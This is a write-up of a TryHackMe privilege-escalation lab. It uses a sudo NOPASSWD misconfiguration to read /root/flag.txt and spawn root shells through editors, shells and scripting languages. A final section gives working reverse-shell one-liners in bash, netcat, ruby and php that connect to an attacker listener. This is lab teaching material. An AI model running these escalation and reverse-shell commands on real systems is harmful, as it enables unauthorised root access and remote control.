THM - Privesc playground

Check it out at TryHackMe Linux PrivEsc Playground

Room created by SherlockSec, TryHackMe profile or also on twitter @SherlockSec

Picture this, you've popped a reverse shell on some ctf box through some complicated exploit. Grabbed the user flag, but then what? You need root! It's PrivEsc (Privelage Escalation) time.

Enumerating

This box is designed to be really easy to get root on, with the challenge being "How many ways can you find to PrivEsc to root?"

First, let's start out with something super simple. Normally this only works in beginner/intermediate CTFs. Let's find out what commands our user can run as sudo!

bash-4.2$ ls
bash-4.2$ whoami
user
bash-4.2$ sudo -l
Matching 'Defaults' entries for user on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user may run the following commands on this host:
(root) NOPASSWD: /bin/apt-get*, (root) /bin/apt*, (root)
/usr/bin/aria2c, (root) /usr/sbin/arp, (root) /bin/ash, (root)
/usr/bin/awk, (root) /usr/bin/base64, (root) /bin/bash, (root)
/bin/busybox, (root) /bin/cat, (root) /bin/chmod, (root) /bin/chown,
(root) /bin/cp, (root) /usr/bin/cpan, (root) /usr/bin/cpulimit, (root)
/bin/crontab, (root) /bin/csh, (root) /bin/curl, (root) /usr/bin/cut,
(root) /bin/dash, (root) /bin/date, (root) /bin/dd, (root)
/usr/bin/diff, (root) /bin/dmesg, (root) /sbin/dmsetup, (root)
/usr/bin/docker, (root) /usr/bin/dpkg, (root) /usr/bin/easy_install,
(root) /usr/bin/emacs, (root) /usr/bin/env, (root) /usr/bin/expand,
(root) /usr/bin/expect, (root) /usr/bin/facter, (root) /usr/bin/file,
(root) /usr/bin/find, (root) /usr/bin/flock, (root) /usr/bin/fmt,
(root) /usr/bin/fold, (root) /usr/bin/ftp, (root) /usr/bin/gawk,
(root) /usr/bin/gdb, (root) /usr/bin/gimp, (root) /usr/bin/git, (root)
/bin/grep, (root) /usr/bin/head, (root) /usr/sbin/iftop, (root)
/usr/bin/ionice, (root) /sbin/ip, (root) /usr/bin/irb, (root)
/usr/bin/jq, (root) /usr/bin/ksh, (root) /sbin/ldconfig, (root)
/usr/bin/less, (root) /sbin/logsave, (root) /usr/bin/ltrace, (root)
/usr/bin/lua, (root) /usr/bin/make, (root) /usr/bin/man, (root)
/usr/bin/mawk, (root) /bin/more, (root) /bin/mount, (root)
/usr/bin/mtr, (root) /bin/mv, (root) /usr/bin/nano, (root)
/usr/bin/nawk, (root) /bin/nc, (root) /usr/bin/nice, (root)
/usr/bin/nl, (root) /usr/bin/nmap, (root) /usr/sbin/node, (root)
/usr/bin/od, (root) /usr/bin/openssl, (root) /usr/bin/perl, (root)
/usr/bin/pg, (root) /usr/bin/php, (root) /usr/bin/pic, (root)
/usr/bin/pico, (root) /usr/bin/pip, (root) /usr/bin/puppet, (root)
/usr/bin/python, (root) /usr/bin/readelf, (root) /usr/bin/redm, (root)
/usr/bin/rlwrap, (root) /usr/bin/rsync, (root) /usr/bin/ruby, (root)
/usr/bin/run-mailcaps, (root) /bin/run-parts, (root) /usr/bin/rvim,
(root) /usr/bin/scp, (root) /usr/bin/screen, (root) /usr/bin/script,
(root) /bin/sed, (root) /usr/sbin/service, (root) /usr/bin/setarch,
(root) /usr/bin/sftp, (root) /usr/bin/smbclient, (root)
/usr/bin/socat, (root) /usr/bin/sort, (root) /usr/bin/sqlite3, (root)
/usr/bin/ssh, (root) /sbin/start-stop-daemon, (root) /usr/bin/stdbuf,
(root) /usr/bin/strace, (root) /usr/bin/tail, (root) /bin/tar, (root)
/usr/bin/taskset, (root) /usr/bin/tclsh, (root) /usr/sbin/tcpdump,
(root) /usr/bin/tee, (root) /usr/bin/telnet, (root) /usr/bin/tftp,
(root) /usr/bin/time, (root) /usr/bin/timeout, (root) /usr/bin/tmux,
(root) /usr/bin/ul, (root) /usr/bin/unexpand, (root) /usr/bin/uniq,
(root) /usr/bin/unshare, (root) /usr/bin/vi, (root) /usr/bin/vim,
(root) /usr/bin/watch, (root) /usr/bin/wget, (root) /usr/bin/xargs,
(root) /usr/bin/xxd, (root) /usr/bin/zip, (root) /usr/bin/zsh

Oh. Oh no. With so many binaries that I can run with sudo, the question is where to start! I don't even need to use the user's password, as these are all set with NOPASSWD. Flags are censored so that you actually run them yourself!

The next step is to find interesting SUID binaries

"Normal" Linux Utils

cp

bash-4.2$ sudo cp /root/flag.txt ~/flag.txt
bash-4.2$ ls
flag.txt
bash-4.2$ cat flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

cat

bash-4.2$ sudo cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

base64 - Technically sudo is optional as base64 has suid set.

bash-4.2$ sudo base64 /root/flag.txt > /home/user/flag.b64
bash-4.2$ base64 -d flag.b64
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!
bash-4.2$ base64 /root/flag.txt > /home/user/flag.b64
bash-4.2$ base64 -d flag.b64
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

xxd - with and without sudo. The SUID bit is set for xxd in /usr/bin.

bash-4.2$ sudo xxd /root/flag.txt
0000000: 436f 6e67 7261 7475 6c61 7469 6f6e 7321  Congratulations!
0000010: 2059 6f75 2067 6f74 2074 6865 2065 6173   You got the eas
0000020: 6965 7374 2066 6c61 6720 6f6e 2054 484d  iest flag on THM
0000030: 210a 0a54 484d 7b33 6173 795f 6631 3467  !..THM{*********
0000040: 5f31 6d34 307d 0a0a 4e6f 7720 676f 2070  *****}..Now go p
0000050: 7269 7620 6573 6320 736f 6d65 206d 6f72  riv esc some mor
0000060: 6521 0a                                  e!.

bash-4.2$ xxd /root/flag.txt
0000000: 436f 6e67 7261 7475 6c61 7469 6f6e 7321  Congratulations!
0000010: 2059 6f75 2067 6f74 2074 6865 2065 6173   You got the eas
0000020: 6965 7374 2066 6c61 6720 6f6e 2054 484d  iest flag on THM
0000030: 210a 0a54 484d 7b33 6173 795f 6631 3467  !..THM{*********
0000040: 5f31 6d34 307d 0a0a 4e6f 7720 676f 2070  *****}..Now go p
0000050: 7269 7620 6573 6320 736f 6d65 206d 6f72  riv esc some mor
0000060: 6521 0a                                  e!.

less/more

bash-4.2$ sudo less /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!
/root/flag.txt (END)
bash-4.2$ sudo more /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Nano

bash-4.2$ sudo nano /root/flag.txt
GNU nano 2.2.6 File: /root/flag.txt

Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!


Vim (and vi etc)

bash-4.2$ sudo vim
~
~
:sh
root@privesc:~# whoami
root
root@privesc:~# cat flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Shells

bash

bash-4.2$ sudo bash
root@privesc:~# ls
flag.txt
root@privesc:~# cat flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!
root@privesc:~#

zsh

bash-4.2$ sudo zsh
privesc# whoami
root
privesc# cat flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

ash

bash-4.2$ sudo ash
# whoami
root
# ls
flag.txt
# cat flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

ksh

bash-4.2$ sudo ksh
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

dash

bash-4.2$ sudo dash
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

csh

bash-4.2$ sudo csh
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Programming/Scripting Languages

Python

bash-4.2$ sudo python -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Python 2.7, as /usr/bin/python2.7 has suid set.

python2.7 -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Perl

bash-4.2$ sudo perl -e 'exec "/bin/sh";'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Lua

bash-4.2$ sudo lua
Lua 5.0.3  Copyright (C) 1994-2006 Tecgraf, PUC-Rio
> os.execute('/bin/sh')
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{*************}
Now go priv esc some more!

Ruby IRB

bash-4.2$ sudo irb
irb(main):001:0> exec("/bin/bash")
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Ruby

bash-4.2$ sudo ruby -e 'exec "/bin/sh"'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Reverse Shells

Pure bash

bash-4.2$ sudo bash -i >& /dev/tcp/10.x.x.x/4444 0>&1
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43367
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Netcat

bash-4.2$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43369
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!
bash-4.2$ sudo ruby -rsocket -e'f=TCPSocket.open("10.x.x.x",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43371
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

This one is slightly more interesting, as PHP runs as root by default on this system. This is because the suid bit is set as shown by the ls command below.

bash-4.2$ ls -lah | grep php
lrwxrwxrwx  1 root   root      21 Nov 27 19:59 php -> /etc/alternatives/php
-rwsr-xr-x  1 root   root    7.8M Feb 13  2017 php5
bash-4.2$ php -r '$sock=fsockopen("10.8.6.110",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43371
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!

Python 2.7, as /usr/bin/python2.7, has suid set.

root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.6.110] from (UNKNOWN) [10.10.32.113] 43374
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!

THM{**************}

Now go priv esc some more!